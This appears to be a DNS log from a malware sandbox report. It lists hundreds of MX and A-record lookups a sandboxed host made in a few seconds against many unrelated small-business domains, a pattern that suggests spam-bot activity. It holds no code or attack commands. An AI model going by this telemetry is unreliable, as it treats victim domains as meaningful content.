                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.529493093 CET1.1.1.1192.168.2.40x273cName error (3)clickbkk.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.536010027 CET1.1.1.1192.168.2.40xdc2eName error (3)dobrybicykel.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.540498972 CET1.1.1.1192.168.2.40xced6Name error (3)gabio.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.565285921 CET1.1.1.1192.168.2.40x17daName error (3)feio.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.575864077 CET1.1.1.1192.168.2.40xa38bName error (3)nippondotech.co.jpnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.599508047 CET1.1.1.1192.168.2.40xc2b3Name error (3)gabio.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.601427078 CET1.1.1.1192.168.2.40xea4dServer failure (2)daxter.fsnet.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.603282928 CET1.1.1.1192.168.2.40x9ab1No error (0)aexoden.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.603282928 CET1.1.1.1192.168.2.40x9ab1No error (0)aexoden.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.606827021 CET1.1.1.1192.168.2.40x7163Name error (3)konic.co.jpnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.606977940 CET1.1.1.1192.168.2.40x391cName error (3)clickbkk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.611823082 CET1.1.1.1192.168.2.40xfd07Name error (3)dobrybicykel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.646575928 CET1.1.1.1192.168.2.40x574No error (0)justdave.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.647491932 CET1.1.1.1192.168.2.40x1844No error (0)elossa.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.647491932 CET1.1.1.1192.168.2.40x1844No error (0)elossa.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.660670042 CET1.1.1.1192.168.2.40xedd2Name error (3)enp.ericsson.senonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.732666016 CET1.1.1.1192.168.2.40x4fd1No error (0)e-art-studio.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.732666016 CET1.1.1.1192.168.2.40x4fd1No error (0)e-art-studio.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.732666016 CET1.1.1.1192.168.2.40x4fd1No error (0)e-art-studio.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.732666016 CET1.1.1.1192.168.2.40x4fd1No error (0)e-art-studio.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.751207113 CET1.1.1.1192.168.2.40x1d7cNo error (0)aexoden.com23.239.22.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.764955044 CET1.1.1.1192.168.2.40x1461No error (0)eshopy-katalog.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.766136885 CET1.1.1.1192.168.2.40xc48fNo error (0)kingsway-hk.com23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.771148920 CET1.1.1.1192.168.2.40xde45Name error (3)khi-ho.ne.jpnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.774463892 CET1.1.1.1192.168.2.40x3089No error (0)detmar.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.774463892 CET1.1.1.1192.168.2.40x3089No error (0)detmar.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.777677059 CET1.1.1.1192.168.2.40x7a88No error (0)eurokamen.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.777677059 CET1.1.1.1192.168.2.40x7a88No error (0)eurokamen.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.778590918 CET1.1.1.1192.168.2.40x4125No error (0)eurisproagro.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.778590918 CET1.1.1.1192.168.2.40x4125No error (0)eurisproagro.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.778590918 CET1.1.1.1192.168.2.40x4125No error (0)eurisproagro.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.783561945 CET1.1.1.1192.168.2.40xf377No error (0)aloeveraforever.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.783561945 CET1.1.1.1192.168.2.40xf377No error (0)aloeveraforever.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.787389994 CET1.1.1.1192.168.2.40x2087No error (0)abatek.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.787389994 CET1.1.1.1192.168.2.40x2087No error (0)abatek.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.787389994 CET1.1.1.1192.168.2.40x2087No error (0)abatek.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.801124096 CET1.1.1.1192.168.2.40xdbecNo error (0)izberatel.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.801124096 CET1.1.1.1192.168.2.40xdbecNo error (0)izberatel.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.809712887 CET1.1.1.1192.168.2.40xe198No error (0)e-art-studio.co.jp216.230.253.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.810466051 CET1.1.1.1192.168.2.40xa38bName error (3)konic.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.810498953 CET1.1.1.1192.168.2.40x89e3No error (0)e-bicycles.eu62.109.151.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.818903923 CET1.1.1.1192.168.2.40xad14No error (0)eshopy-katalog.sk141.98.102.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.829204082 CET1.1.1.1192.168.2.40x9328No error (0)abatek.sk46.229.230.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.848583937 CET1.1.1.1192.168.2.40xe808No error (0)kompresory-servis.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.874226093 CET1.1.1.1192.168.2.40x175eName error (3)eluxviaggi.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.887614965 CET1.1.1.1192.168.2.40x21caNo error (0)kingsway-hk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.896294117 CET1.1.1.1192.168.2.40x571bNo error (0)justdave.net173.236.212.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.933706999 CET1.1.1.1192.168.2.40xe0bNo error (0)eurokamen.sk92.240.253.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.946949005 CET1.1.1.1192.168.2.40xca9No error (0)oitacity.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.949904919 CET1.1.1.1192.168.2.40x48beNo error (0)aloeveraforever.sk37.9.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.968856096 CET1.1.1.1192.168.2.40x6ddfNo error (0)elrocket.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:20.968856096 CET1.1.1.1192.168.2.40x6ddfNo error (0)elrocket.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.010945082 CET1.1.1.1192.168.2.40x3e6bNo error (0)keramat.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.032861948 CET1.1.1.1192.168.2.40x8938Name error (3)khi-ho.ne.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.048336983 CET1.1.1.1192.168.2.40xd417No error (0)detmar.sk185.32.160.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.049603939 CET1.1.1.1192.168.2.40x9da0No error (0)fermatsk.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.052515984 CET1.1.1.1192.168.2.40x2e7cName error (3)animekingdom.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.058068037 CET1.1.1.1192.168.2.40xcb11No error (0)elteconline.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.062705040 CET1.1.1.1192.168.2.40x4db1Name error (3)merlynsociety.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.065076113 CET1.1.1.1192.168.2.40xe1a2Name error (3)enp.ericsson.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.082920074 CET1.1.1.1192.168.2.40x1176No error (0)e-bicycles.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.082920074 CET1.1.1.1192.168.2.40x1176No error (0)e-bicycles.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.082920074 CET1.1.1.1192.168.2.40x1176No error (0)e-bicycles.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.082920074 CET1.1.1.1192.168.2.40x1176No error (0)e-bicycles.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.111047983 CET1.1.1.1192.168.2.40x335eNo error (0)hokal.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.111047983 CET1.1.1.1192.168.2.40x335eNo error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.117660046 CET1.1.1.1192.168.2.40xadbeName error (3)gryffindorhouse.co.uknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.124560118 CET1.1.1.1192.168.2.40x3215No error (0)tsutomu.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.127399921 CET1.1.1.1192.168.2.40xf626No error (0)nakacho.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.162276983 CET1.1.1.1192.168.2.40x3e7bNo error (0)elossa.de217.160.223.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.171350002 CET1.1.1.1192.168.2.40x6c73Name error (3)ivory.plala.co.jpnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.242259026 CET1.1.1.1192.168.2.40x9ff2No error (0)instalanova.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.242259026 CET1.1.1.1192.168.2.40x9ff2No error (0)instalanova.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.242259026 CET1.1.1.1192.168.2.40x9ff2No error (0)instalanova.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.242259026 CET1.1.1.1192.168.2.40x9ff2No error (0)instalanova.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.255156994 CET1.1.1.1192.168.2.40x356fNo error (0)janckulik.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.255156994 CET1.1.1.1192.168.2.40x356fNo error (0)janckulik.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.260620117 CET1.1.1.1192.168.2.40xbb38No error (0)roland-sk.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.260620117 CET1.1.1.1192.168.2.40xbb38No error (0)roland-sk.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.260620117 CET1.1.1.1192.168.2.40xbb38No error (0)roland-sk.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.322580099 CET1.1.1.1192.168.2.40x177eNo error (0)brightright.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.333559036 CET1.1.1.1192.168.2.40xfa73No error (0)erikamoveis.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.333559036 CET1.1.1.1192.168.2.40xfa73No error (0)erikamoveis.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.333559036 CET1.1.1.1192.168.2.40xfa73No error (0)erikamoveis.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.333559036 CET1.1.1.1192.168.2.40xfa73No error (0)erikamoveis.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.340729952 CET1.1.1.1192.168.2.40x85b3No error (0)kanapy.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.340729952 CET1.1.1.1192.168.2.40x85b3No error (0)kanapy.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.351686954 CET1.1.1.1192.168.2.40x7885No error (0)inhodinky.sk85.248.129.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.351686954 CET1.1.1.1192.168.2.40x7885No error (0)inhodinky.sk85.248.129.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.351686954 CET1.1.1.1192.168.2.40x7885No error (0)inhodinky.sk85.248.129.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.374892950 CET1.1.1.1192.168.2.40x8f9eNo error (0)nakacho.com162.43.104.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.404709101 CET1.1.1.1192.168.2.40x22No error (0)emr.com.arMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.573379040 CET1.1.1.1192.168.2.40xba15No error (0)kompresory-servis.sk83.167.249.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.579185963 CET1.1.1.1192.168.2.40xdddNo error (0)emmetisportfun.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.579456091 CET1.1.1.1192.168.2.40x2364Name error (3)nippondotech.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.638513088 CET1.1.1.1192.168.2.40x613No error (0)nakupusa.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.638513088 CET1.1.1.1192.168.2.40x613No error (0)nakupusa.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.638513088 CET1.1.1.1192.168.2.40x613No error (0)nakupusa.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.659059048 CET1.1.1.1192.168.2.40x347No error (0)magokorokan.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.694035053 CET1.1.1.1192.168.2.40x7e84No error (0)izberatel.sk81.0.206.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.694248915 CET1.1.1.1192.168.2.40x37d0No error (0)elrocket.com217.26.54.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.770450115 CET1.1.1.1192.168.2.40xd7aeNo error (0)predan.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.773394108 CET1.1.1.1192.168.2.40x53a1No error (0)oitacity.jp59.106.13.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.791520119 CET1.1.1.1192.168.2.40xabe0No error (0)mailin2.inhodinky.sk37.9.169.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.864741087 CET1.1.1.1192.168.2.40x6d16No error (0)eurisproagro.sk46.229.230.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:21.955032110 CET1.1.1.1192.168.2.40x693No error (0)sport-tour.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.411472082 CET1.1.1.1192.168.2.40xe65aNo error (0)preda.plMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.586287975 CET1.1.1.1192.168.2.40x9098No error (0)elektrospol.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.586287975 CET1.1.1.1192.168.2.40x9098No error (0)elektrospol.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:22.586287975 CET1.1.1.1192.168.2.40x9098No error (0)elektrospol.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.396171093 CET1.1.1.1192.168.2.40xc526Name error (3)spona-na-ponozky.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.408663988 CET1.1.1.1192.168.2.40x63b6No error (0)in1-smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.408663988 CET1.1.1.1192.168.2.40x63b6No error (0)in1-smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.408663988 CET1.1.1.1192.168.2.40x63b6No error (0)in1-smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.408663988 CET1.1.1.1192.168.2.40x63b6No error (0)in1-smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.408663988 CET1.1.1.1192.168.2.40x63b6No error (0)in1-smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.408663988 CET1.1.1.1192.168.2.40x63b6No error (0)in1-smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.438220978 CET1.1.1.1192.168.2.40xe8c9No error (0)mx00.schlund.de212.227.15.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.453311920 CET1.1.1.1192.168.2.40xee3bNo error (0)enso-center.org15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.453311920 CET1.1.1.1192.168.2.40xee3bNo error (0)enso-center.org3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.467658997 CET1.1.1.1192.168.2.40x1f4bName error (3)eluxviaggi.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.520284891 CET1.1.1.1192.168.2.40x94a9Name error (3)piaggio-bratislava.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.527600050 CET1.1.1.1192.168.2.40x2acNo error (0)ampub04.alpha-mail.net216.230.254.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.537424088 CET1.1.1.1192.168.2.40x5849Name error (3)aquamat-liptov.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.554902077 CET1.1.1.1192.168.2.40xc9cdName error (3)merlynsociety.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.559016943 CET1.1.1.1192.168.2.40x812cNo error (0)zimbra.justdave.net173.255.193.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.631318092 CET1.1.1.1192.168.2.40x53beNo error (0)reproma.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.631318092 CET1.1.1.1192.168.2.40x53beNo error (0)reproma.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.631318092 CET1.1.1.1192.168.2.40x53beNo error (0)reproma.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.637172937 CET1.1.1.1192.168.2.40x53e2No error (0)escolapatelli.com.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.640012026 CET1.1.1.1192.168.2.40xa469No error (0)elteconline.com86.107.32.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.648303986 CET1.1.1.1192.168.2.40xf02eNo error (0)kanapy.sk37.9.175.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.657843113 CET1.1.1.1192.168.2.40x9061No error (0)sluchatka.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.657843113 CET1.1.1.1192.168.2.40x9061No error (0)sluchatka.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.664742947 CET1.1.1.1192.168.2.40x11f6No error (0)predajpaliet.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.671107054 CET1.1.1.1192.168.2.40x7384No error (0)tsutomu.com64.190.63.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.768234015 CET1.1.1.1192.168.2.40x254fNo error (0)rotas.skMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.904691935 CET1.1.1.1192.168.2.40xaa5dNo error (0)emmetisportfun.it89.46.109.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.906511068 CET1.1.1.1192.168.2.40x2c7No error (0)s-kotobuki-s.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.990736008 CET1.1.1.1192.168.2.40x93c2No error (0)keramat.sk172.67.152.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:23.990736008 CET1.1.1.1192.168.2.40x93c2No error (0)keramat.sk104.21.2.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.061605930 CET1.1.1.1192.168.2.40xb537No error (0)ericrothphoto.com35.190.10.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.072549105 CET1.1.1.1192.168.2.40x7728Name error (3)ivory.plala.co.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.255373955 CET1.1.1.1192.168.2.40xfc07No error (0)magokorokan.com157.205.193.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.324778080 CET1.1.1.1192.168.2.40x8a6dNo error (0)erikamoveis.com.br187.45.195.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.345855951 CET1.1.1.1192.168.2.40x9648No error (0)roland-sk.sk93.185.102.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.584927082 CET1.1.1.1192.168.2.40xbfaNo error (0)mc3.co.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:24.594587088 CET1.1.1.1192.168.2.40xb719No error (0)nakupusa.cz93.184.77.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:25.559638977 CET1.1.1.1192.168.2.40x7563Server failure (2)straznyanjel.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.188796043 CET1.1.1.1192.168.2.40x6b3cNo error (0)reproma.sk46.229.230.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.189882040 CET1.1.1.1192.168.2.40x6380Name error (3)feio.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.193774939 CET1.1.1.1192.168.2.40xd09eName error (3)dobrybicykel.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.197869062 CET1.1.1.1192.168.2.40xe2a0Name error (3)khi-ho.ne.jpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.202008009 CET1.1.1.1192.168.2.40xfb58Name error (3)aquamat-liptov.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.216237068 CET1.1.1.1192.168.2.40x59c4Name error (3)spona-na-ponozky.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.226603985 CET1.1.1.1192.168.2.40x3a2eName error (3)piaggio-bratislava.sknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.226617098 CET1.1.1.1192.168.2.40x55d3Name error (3)merlynsociety.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.240156889 CET1.1.1.1192.168.2.40xf742Name error (3)animekingdom.netnonenoneA (IP address)IN (0x0001)false
